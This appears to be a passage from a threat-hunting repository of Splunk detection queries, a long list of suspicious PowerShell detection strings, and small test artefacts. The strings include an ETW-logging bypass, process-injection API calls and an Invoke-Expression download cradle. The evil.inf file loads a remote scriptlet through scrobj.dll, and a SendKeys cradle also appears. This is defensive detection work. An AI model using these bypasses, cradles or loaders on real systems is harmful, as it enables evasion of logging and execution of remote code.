5 | | transaction indicator_group, hostname_ip, user, image, commandline, parent_image mvraw=true delim="$:$"
6 |
--------------------------------------------------------------------------------
/Splunk/roastiekerb:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Security" EventCode=4769 ServiceName!=krbtgt ServiceName!="*$" TargetUserName!="*$@*" TicketEncryptionType=0x17 | rex field=Target_User_Name "^(?.*)@"
2 | | where user != ServiceName| stats values(ServiceName) as ServiceName values(Status), values(TicketOptions), values(TicketEncryptionType), dc(ServiceName) as distinctservicecount by user| where distinctservicecount > 5
3 |
--------------------------------------------------------------------------------
/Splunk/scheduledtaskCMDLine:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 (Image="*\\at.exe" CommandLine="*cmd //c*" OR CommandLine=*:\\*) OR (Image="*\\schtasks.exe" CommandLine="*create*" CommandLine="*/s *")
2 |
--------------------------------------------------------------------------------
/Splunk/selfdelete:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 cmd.exe del
2 | | search NewProcessName="*\\cmd.exe" CommandLine="*ping *> Nul & del *" OR CommandLine="*choice*&*del *"
3 |
--------------------------------------------------------------------------------
/Splunk/shimreg:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=12 TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/shimsdb:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 NewProcessName="C:\\Windows\\System32\\sdbinst.exe" OR NewProcessName="C:\\Windows\\SysWOW64\\sdbinst.exe"
2 |
--------------------------------------------------------------------------------
/Splunk/singlecharproc:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688
2 | | eval Filename=mvindex(split(NewProcessName,"\\"),-1)
3 | | eval Filename_Length = length(replace(Filename, "\.[^.]+$", ""))
4 | | search Filename_Length=1
5 |
--------------------------------------------------------------------------------
/Splunk/startupexe:
--------------------------------------------------------------------------------
1 | source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"EventCode=1 ParentImage="*\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*"
2 |
--------------------------------------------------------------------------------
/Splunk/susprecyclebinfiles:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=11 TargetFilename="*\\$recycle.bin\\*" file_name=*.exe OR file_name=*.rar OR file_name=*.zip OR file_name=*.dll OR file_name=*.bat OR file_name=*.cmd OR file_name=*.js OR file_name=*.vbs OR file_name=*.cs OR file_name=*.ps1 OR file_name=*.psm OR file_name=*.psd
2 | |rename Computer as hostname_ip, Image as image, file_path as filepath, file_name as filename
3 | | eval indicator_group = "Host: " . hostname_ip . " Image: " . image . " FilePath: " . filepath. " FileName: " . filename
4 | | table indicator_group, hostname_ip, image, filepath, filename
5 |
--------------------------------------------------------------------------------
/Splunk/trackerdllinj:
--------------------------------------------------------------------------------
1 | tracker| search sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 Filename=Tracker.exe
2 |
--------------------------------------------------------------------------------
/Splunk/vaultcmd:
--------------------------------------------------------------------------------
1 | sourcetype=*WinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=1 Filename=vaultcmd.exe CommandLine="* /list*"
2 |
--------------------------------------------------------------------------------
/Splunk/w3wpchild:
--------------------------------------------------------------------------------
1 | sourcetype="*WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentFilename=w3wp.exe Filename=cmd.exe OR Filename=powershell.exe
2 |
--------------------------------------------------------------------------------
/Splunk/wevtutil:
--------------------------------------------------------------------------------
1 | source=*WinEventLog:Security EventCode=4688 wevtutil.exe
2 | | search (CommandLine="*sl*" OR CommandLine="*set-log*" OR CommandLine="*cl*") (CommandLine="*security*" OR CommandLine="*sysmon*" OR CommandLine="*powershell*" OR CommandLine="*application*")
3 | | search NOT CommandLine="*wevtutil epl*" AND NOT CommandLine="*wevtutil export-log*"
4 | | search NOT CommandLine="*/bu*"
5 |
--------------------------------------------------------------------------------
/Splunk/wmitraceprocesscreate:
--------------------------------------------------------------------------------
1 | source="*WinEventLog:Microsoft-Windows-WMI-Activity/Trace" EventCode=11 Operation="*Win32_Process::Create*"
2 |
--------------------------------------------------------------------------------
/SuspiciousPowershellScriptText:
--------------------------------------------------------------------------------
1 | *[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)*
2 | *[System.IO.FileStream] $* = New-Object System.IO.FileStream($*, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $*)*
3 | *if ($* -gt ($* - 1) -or $* -lt 0) {Throw "StartByte range must be between 0 and $*"}*
4 | *Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'CheckAccess' -ArgumentList $*, $*, $*
5 | *Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }*
6 | *$*.ToString("X$($*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $* += [Byte] ('0x{0}' -f $_) } }*
7 | *Invoke(0x001F0FFF, $*, $*)*
8 | *Invoke($*, [IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
9 | *Invoke($*, $*, $*, $*.Length, [Ref] 0) | Out-Null*
10 | *Invoke([IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
11 | *Invoke([IntPtr]::Zero, $*.Length + 1, 0x3000, 0x40)*
12 | *@(Get-WmiObject -Query 'SELECT AddressWidth FROM Win32_Processor')[0] | Select-Object -ExpandProperty AddressWidth*
13 | *Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])*
14 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
15 | *Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])*
16 | *DefineDynamicAssembly($*, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)*
17 | *DefineLiteral('x64', [UInt16] 0x8664) | Out-Null*
18 | *DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null*
19 | *DefineType('IMAGE_NT_HEADERS32', $*, [System.ValueType], 248)*
20 | *Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])*
21 | *[System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2*
22 | *[IntPtr]$* = [IntPtr](Add-SignedIntAsUnsigned ($*) ($*))*
23 | *[System.Runtime.InteropServices.Marshal]::WriteByte($*, $*, $Bytes[$*])*
24 | *DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $*, $*)*
25 | *OpenThreadToken.Invoke($*, $*.TOKEN_QUERY -bor $*.TOKEN_ADJUST_PRIVILEGES, $*, [Ref]$*)*
26 | *[System.Runtime.InteropServices.Marshal]::PtrToStructure($*, [Type]$*.TOKEN_PRIVILEGES)*
27 | *NtCreateThreadEx.Invoke([Ref]$*, 0x1FFFFF, [IntPtr]::Zero, $*, $*, $*, $*, 0, 0xffff, 0xffff, [IntPtr]::Zero)*
28 | *[IntPtr](Add-SignedIntAsUnsigned ([Int64]$*) ([Int64][UInt64]$*.e_lfanew))*
29 | *DefineDynamicAssembly($*, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)*
30 | *DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $*, $*)*
31 | *Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null*
32 | *New-Object IO.Compression.DeflateStream ($*, [IO.Compression.CompressionMode]::Compress)*
33 | *Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='Updater'" | Remove-WmiObject*
34 | *'`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive`"'*
35 | *[Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator')*
36 | *[Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()*
37 | *Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages'*
38 | *::EnumerateSecurityPackages([Ref] $*, [Ref] $*)*
39 | *New-Object System.IO.Pipes.NamedPipeServerStream($*,"InOut",100, "Byte", "None", 1024, 1024, $*)*
40 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
41 | *Invoke($*, $*, $*, 0xF003F, 0x10, 0x3, 0x1, $*, $*, $*, $*, $*, $*)*
42 | *(New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $*)).Translate([Security.Principal.NTAccount]).Value*
43 | *([System.math]::Pow(2, $*)-1) * ([System.Math]::Pow(2,(32 - $*)))*
44 | *@(80,23,443,21,3389,110,445,139,143,53,135,3306,8080,22*
45 | *new-object System.Net.Sockets.TcpClient $*.AddressFamily*
46 | *Register-ObjectEvent -InputObject $*[$*] -EventName Elapsed -Action $* | Out-Null*
47 | *[System.IO.FileStream] $* = New-Object System.IO.FileStream($*, [System.IO.FileMode]::Create, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None, $*)*
48 | *[Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]*
49 | *Emit([Reflection.Emit.OpCodes]::Ldtoken, $*)*
50 | *New-Object System.Threading.Mutex $*,'CSVMutex';*
51 | *([Net.Dns]::GetHostEntry($*)).AddressList)*
52 | *(New-Object System.Security.Principal.NTAccount($*, $*))*
53 | *Translate( [System.Security.Principal.NTAccount]).Value*
54 | *OpenSubkey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings")*
55 | *New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $*
56 | *GetAccessRules($*,$*,[System.Security.Principal.SecurityIdentifier])*
57 | *GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $*, $*, $*)*
58 | *New-Object System.DirectoryServices.DirectorySearcher([ADSI]$*)*
59 | *Get-DomainSearcher -Domain $* -DomainController $* -PageSize $* -Credential $*
60 | *Get-DomainSearcher -Domain $* -DomainController $* -PageSize $* -Credential $* -ADSprefix "DC=$($*),CN=MicrosoftDNS,DC=DomainDnsZones"*
61 | *New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $*)*
62 | *New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $*, $*.UserName, $*.GetNetworkCredential().Password)*
63 | *New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $*
64 | *([ADSI]"WinNT://$*/$*,group").add("WinNT://$*/$*,user")*
65 | *New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $*, $*
66 | *filter="(&(name=$*)(distinguishedname=$*)$*)"*
67 | *filter="(&(objectCategory=organizationalUnit)(name=$*))"*
68 | *($* -cmatch "^DWM-.*" -and $* -cmatch "^Window\sManager$")*
69 | *($* -cmatch "NT\sAUTHORITY" -or $* -cmatch "Window\sManager")*
70 | *Get-WinEvent -LogName "Microsoft-Windows-AppLocker/EXE and DLL" -ErrorAction SilentlyContinue | Where {$_.Id -eq 8002}*
71 | *Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue | Where {$_.Id -eq 4100}*
72 | *Get-ChildItem "HKU:\$($*)\Software\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue*
73 | *'[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$* = New-Object Net.WebClient;$*.Proxy=[Net.WebRequest]::GetSystemWebProxy();$*.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $*.downloadstring('''+$*+''');'*
74 | *[System.Diagnostics.Process]::Start($*)*
75 | *DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly')*
76 | *Emit([System.Reflection.Emit.OpCodes]::Ldarg_0)*
77 | *[Byte[]] @(0x60,0xE8,0x04,0,0,0,0x61,0x31,0xC0,0xC3)*
78 | *[Byte[]] @(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,0x55,0xE8,0x0D,0x00,0x00,0x00,0x5D,0x41,0x5F,0x41,0x5E,0x41,0x5D,0x41,0x5C,0x48,0x31,0xC0,0xC3)*
79 | *New-Object System.Web.Script.Serialization.JavaScriptSerializer*
80 | *Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $* |% {($_.Matches).Value} |Sort -Unique*
81 | *Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }*
82 | *Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue*
83 | *"$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\"*
84 | *New-Object System.Windows.Forms.TextBox*
85 | *($*.Text.Length -ne 0) -and ($*.Text.Length -ne $*)*
86 | *$TypeBuilder.DefineMethod('GetAsyncKeyState', 'Public, Static', [Int16], [Type[]] @([Windows.Forms.Keys]))*
87 | *$TypeBuilder.DefineMethod('MapVirtualKey', 'Public, Static', [Int32], [Type[]] @([Int32], [Int32]))*
88 | *ConnectionString = "Server=$*$*;Database=$*;Integrated Security=SSPI;Connection Timeout=1"*
89 | *ConnectionString = "Server=$*$*;Database=$*;Integrated Security=SSPI;uid=$*;pwd=$*;Connection Timeout=$*"*
90 | *ConnectionString = "Server=$*$*;Database=$*;User ID=$*;Password=$*;Connection Timeout=$*"*
91 | *New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($*, $*)*
92 | *New-Object Drawing.Bitmap $*.Width, $*.Height;*
93 | *New-Object System.Drawing.Imaging.EncoderParameters;*
94 | *New-Object IntPtr ($*.ToInt64()+$*)*
95 | *TVqQAAMA*
96 | *"" + $*.padright(256, "?") + ""*
97 | *$* -ne [Management.Automation.PSCredential]::Empty*
98 | *[Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')*
99 | *filter = "(&(samAccountType=805306368)$*)"*
100 | *[System.Runtime.InteropServices.Marshal]::AllocHGlobal($*)*
101 | *([Int] $*.DllCharacteristics -band $*.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $*.IMAGE_DLLCHARACTERISTICS_NX_COMPAT*
102 | *[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($*, $*)*
103 | *powershell_reflective_*
104 | *TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncm*
105 | [Int16]$* = '0x{0}' -f ((($*[($*+1)..($*)]) | % {$_.ToString('X2')}) -join '')
106 | [system.runtime.interopservices.marshal]::StructureToPtr($*, $*, $*)
107 | [Int32]$* = '0x{0}' -f ((($*[($*+19)..($*+16)]) | % {$_.ToString('X2')}) -join '')
108 | $* = [System.Runtime.InteropServices.Marshal]::ReadInt32($($*.ToInt64())+4)
109 | $* = [*]::CreateFileTransacted($*.TargetPath,0xC0000000,0,[IntPtr]::Zero,2,0x80,[IntPtr]::Zero,$*,[IntPtr]::Zero,[IntPtr]::Zero)
110 | $* = [*]::NtCreateSection([ref]$hSection,0xF001F,[IntPtr]::Zero,[ref]$LargeInteger,2,0x1000000,$hTransactedFile)
111 | $* = [*]::NtCreateProcessEx([ref]$*,0x1FFFFF,[IntPtr]::Zero,$*,4,$*,[IntPtr]::Zero,[IntPtr]::Zero,0)
112 | $* = [*]::NtCreateThreadEx([ref]$*,0x1FFFFF,[IntPtr]::Zero,$*,[IntPtr]$*,[IntPtr]::Zero,$*,0,0,0,[IntPtr]::Zero)
113 | $* = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static');
114 | $* = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid());
115 | *ExecuteShellCommand*
116 | *GetDelegateForFunctionPointer*
117 | *GetModuleHandle*
118 | *GetProcAddress*
119 | *Groups.User.Properties.cpassword*
120 | *IMAGE_NT_OPTIONAL_HDR64_MAGIC*
121 | *InteropServices.HandleRef*
122 | *kernel32.dll*
123 | *LSA_UNICODE_STRING*
124 | *Management.Automation.RuntimeException*
125 | *Metasploit*
126 | *Microsoft.Win32.UnsafeNativeMethods*
127 | *MiniDumpWriteDump*
128 | *msvcrt.dll*
129 | *OpenProcess*
130 | *PAGE_EXECUTE_READ*
131 | *psremoting*
132 | *pssession*
133 | *ReadProcessMemory.Invoke*
134 | *Reflection.Emit.CustomAttributeBuilder*
135 | *Reflection.Emit.OpCodes*
136 | *ScheduledTasks.Task.Properties.cpassword*
137 | *SE_PRIVILEGE_ENABLED*
138 | *Security.Cryptography.CryptoStream*
139 | *SECURITY_DELEGATION*
140 | *System.BitConverter*
141 | *System.DirectoryServices.ActiveDirectory*
142 | *System.DirectoryServices.DirectorySearcher*
143 | *system.dll*
144 | *System.IdentityModel.Tokens.KerberosRequestorSecurityToken*
145 | *Add-Type*
146 | *DllImport*
147 | *DefineDynamicAssembly*
148 | *DefineDynamicModule*
149 | *DefineType*
150 | *DefineConstructor*
151 | *CreateType*
152 | *DefineLiteral*
153 | *DefineEnum*
154 | *DefineField*
155 | *ILGenerator*
156 | *Emit*
157 | *UnverifiableCodeAttribute*
158 | *DefinePInvokeMethod*
159 | *GetTypes*
160 | *GetAssemblies*
161 | *Methods*
162 | *Properties*
163 | *GetConstructor*
164 | *GetConstructors*
165 | *GetDefaultMembers*
166 | *GetEvent*
167 | *GetEvents*
168 | *GetField*
169 | *GetFields*
170 | *GetInterface*
171 | *GetInterfaceMap*
172 | *GetInterfaces*
173 | *GetMember*
174 | *GetMembers*
175 | *GetMethod*
176 | *GetMethods*
177 | *GetNestedType*
178 | *GetNestedTypes*
179 | *GetProperties*
180 | *GetProperty*
181 | *InvokeMember*
182 | *MakeArrayType*
183 | *MakeByRefType*
184 | *MakeGenericType*
185 | *MakePointerType*
186 | *DeclaringMethod*
187 | *DeclaringType*
188 | *ReflectedType*
189 | *TypeHandle*
190 | *TypeInitializer*
191 | *UnderlyingSystemType*
192 | *InteropServices*
193 | *Marshal*
194 | *AllocHGlobal*
195 | *PtrToStructure*
196 | *StructureToPtr*
197 | *FreeHGlobal*
198 | *IntPtr*
199 | *MemoryStream*
200 | *DeflateStream*
201 | *FromBase64String*
202 | *EncodedCommand*
203 | *Bypass*
204 | *ToBase64String*
205 | *ExpandString*
206 | *GetPowerShell*
207 | *OpenProcess*
208 | *VirtualAlloc*
209 | *VirtualFree*
210 | *WriteProcessMemory*
211 | *CreateUserThread*
212 | *CloseHandle*
213 | *GetDelegateForFunctionPointer*
214 | *kernel32*
215 | *CreateThread*
216 | *memcpy*
217 | *LoadLibrary*
218 | *GetModuleHandle*
219 | *GetProcAddress*
220 | *VirtualProtect*
221 | *FreeLibrary*
222 | *ReadProcessMemory*
223 | *CreateRemoteThread*
224 | *AdjustTokenPrivileges*
225 | *WriteByte*
226 | *WriteInt32*
227 | *OpenThreadToken*
228 | *PtrToString*
229 | *ZeroFreeGlobalAllocUnicode*
230 | *OpenProcessToken*
231 | *GetTokenInformation*
232 | *SetThreadToken*
233 | *ImpersonateLoggedOnUser*
234 | *RevertToSelf*
235 | *GetLogonSessionData*
236 | *CreateProcessWithToken*
237 | *DuplicateTokenEx*
238 | *OpenWindowStation*
239 | *OpenDesktop*
240 | *MiniDumpWriteDump*
241 | *AddSecurityPackage*
242 | *EnumerateSecurityPackages*
243 | *GetProcessHandle*
244 | *DangerousGetHandle*
245 | *CryptoServiceProvider*
246 | *Cryptography*
247 | *RijndaelManaged*
248 | *SHA1Managed*
249 | *CryptoStream*
250 | *CreateEncryptor*
251 | *CreateDecryptor*
252 | *TransformFinalBlock*
253 | *DeviceIoControl*
254 | *SetInformationProcess*
255 | *PasswordDeriveBytes*
256 | *GetAsyncKeyState*
257 | *GetKeyboardState*
258 | *GetForegroundWindow*
259 | *BindingFlags*
260 | *NonPublic*
261 | *ScriptBlockLogging*
262 | *LogPipelineExecutionDetails*
263 | *ProtectedEventLogging*
264 | *adsisearcher*
265 | *[Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey*
266 | *[Net.Dns]::GetHostEntry*
267 | *[System.Convert]::ToBase64String*
268 | *[System.Convert]::FromBase64String*
269 | *[System.Reflection.BindingFlags]::GetProperty*
270 | *0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4*
271 | *BeginConnect*
272 | *ConvertTo-SecureString*
273 | *DirectoryServices.DirectoryEntry*
274 | *DsEnumerateDomainTrusts*
275 | *iex*
276 | *Invoke-Command*
277 | *Invoke-Expression*
278 | *powershell.exe*
279 | *Reflection.Assembly*
280 | *Runtime.InteropServices*
281 | *System.Management.Automation.WindowsErrorReporting*
282 | *System.MulticastDelegate*
283 | *System.Net.IPAddress*
284 | *System.Net.Http*
285 | *System.Net.Sockets*
286 | *System.Net.WebClient*
287 | *System.Random*
288 | *System.Reflection.CallingConventions*
289 | *System.Security.AccessControl.AccessControlType*
290 | *System.Security.Cryptography*
291 | *System.Threading.Mutex*
292 | *System.Web.Script*
293 | *TOKEN_ADJUST_PRIVILEGES*
294 | *TOKEN_ALL_ACCESS*
295 | *TOKEN_ASSIGN_PRIMARY*
296 | *TOKEN_DUPLICATE*
297 | *TOKEN_ELEVATION*
298 | *TOKEN_IMPERSONATE*
299 | *TOKEN_INFORMATION_CLASS*
300 | *TOKEN_PRIVILEGES*
301 | *TOKEN_QUERY*
302 | *wsman*
303 | *New-JobTrigger*
304 | *NTLMSSPNegotiate_InitialContextTokenID*
305 | *MMC20.Application*
306 | *[Activator]::CreateInstance([type]::GetTypeFromProgID*
307 | *Microsoft.Build.Evaluation.Project*
308 |
--------------------------------------------------------------------------------
/XMLcradle.txt:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Get-WmiObject Win32_Process -Computer 'localhost'
5 |
6 |
7 |
--------------------------------------------------------------------------------
/cmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MatthewDemaske/ThreatHuntingStuff/e3fb6434fb6b8e7ee10cec52e5487922734f4ad6/cmd.exe
--------------------------------------------------------------------------------
/evil.inf:
--------------------------------------------------------------------------------
1 | [Version]
2 | Signature=$POO$
3 |
4 | [DefaultInstall]
5 | UnregisterDlls = Poo
6 |
7 | [Poo]
8 | 11,,scrobj.dll,2,60,https://raw.githubusercontent.com/MatthewDemaske/ThreatHuntingStuff/master/evil.sct
9 |
--------------------------------------------------------------------------------
/evil.sct:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
11 |
12 |
13 |
21 |
22 |
23 |
--------------------------------------------------------------------------------
/generictest.txt:
--------------------------------------------------------------------------------
1 | Write-Host "Boop" -ForegroundColor Green
2 |
--------------------------------------------------------------------------------
/sendkeysPSCradle:
--------------------------------------------------------------------------------
1 | $wshell = New-Object -ComObject wscript.shell $wshell.run("notepad") $wshell.AppActivate('Untitled - Notepad')
2 | Start-Sleep 2 $wshell.SendKeys('^o')
3 | Start-Sleep 2 $wshell.SendKeys('') $wshell.SendKeys('~')
4 | Start-Sleep 5 $wshell.SendKeys('^a') $wshell.SendKeys('^c')
5 |
--------------------------------------------------------------------------------